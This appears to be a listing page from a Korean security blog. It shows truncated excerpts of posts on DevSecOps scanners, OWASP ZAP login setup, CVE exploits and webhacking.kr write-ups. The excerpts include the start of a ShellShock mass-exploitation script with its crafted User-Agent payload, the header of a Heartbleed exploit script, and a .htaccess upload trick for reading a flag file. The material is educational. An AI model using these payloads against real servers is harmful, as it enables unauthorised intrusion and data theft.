2. Information Security37 3. DevSecOps 툴 (업데이트 예정) 스카우트(AWS), 아라치니, MobSF, ZAP API with Jenkins, Archerysec(어플리케이션 보안), anchore(Container 보안) 2020. 8. 12. 2. Vuls (CVE 취약점 관리 오픈소스) vuls.io/ Vuls · Agentless Vulnerability Scanner for Linux/FreeBSD Agentless Vulnerability Scanner for Linux/FreeBSD vuls.io 구현내용 추가 예정 2020. 6. 16. 10. 웹 해킹 이론, 실습 실습환경 : Bbox 2020. 6. 10. 3. CVE-2014-6271 (ShellShock) #Title: Shell Shock Auto Exploitation Script # Author: Rafay Baloch import requests,sys if (len(sys.argv) < 2): print "Usage: shocktest.py file.txt" exit(0) def main(): file = sys.argv[1] with open(file) as f: file = f.read().splitlines() for url in file: cmd="() { test;};/bin/nopatchobfu" headers = {'user-agent': cmd} r=requests.get(url, headers=headers) if r.status_code == 500: print url,"is V.. 2020. 6. 9. 2. CVE-2014-0160 (Heartbleed) #!/usr/bin/python # Modified by Travis Lee # Last Updated: 4/21/14 # Version 1.16 # # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line de.. 2020. 6. 9. 1. CVE-2017-1278 (Aapache Struts) www.youtube.com/watch?v=-A2p_94Jwso 2020. 6. 9. 1. OWASP ZAP (ZAP PROXY) LOGIN https://www.zaproxy.org/ The ZAP Homepage Welcome to ZAP! www.zaproxy.org 1. Login 설정 (Target 디렉토리에 Flag as Context 설정) 2. Target 디렉토리에 Flag as Context 적용되면 빨간색 표기를 볼 수 있음 3. 로그인 페이지에서 우클릭 후 From-based Auth Login Request 선택 4. Prameter 지정 (Username, Password) + CSRF 설정 토큰 존재시(User_token) Anti CSRF 설정 후 Parameter 정의 5. Context -> Users -> Add -> Login 계정 설정 -> Modify -> Enable 6. 자물쇠 아이콘 선택 (Logi.. 2020. 2. 14. 웹해킹 28번 (webhacking.kr old 28) 1. 취약점 환경 : Apache, htaccess 2. Write Up 해당 문제는 현재 정상 동작하지 않는 것으로 판단됨 - 문제를 해결하기 위해 flag.php 파일을 실행(Excute)가 아닌 읽어오기(Read) 해야함 - 읽기 혹은 쓰기 권한을 변경하려면 해당 디렉토리에 .htaccess 파일을 업로드한 뒤 flag.php를 읽으면 Sovle - .htaceess php_flag_engine off 2020. 2. 13. 웹해킹 27번 (webhacking.kr old 27) 1. 취약점 환경 : PHP 2. Write Up 2020. 2. 13. 이전 1 2 3 4 5 다음
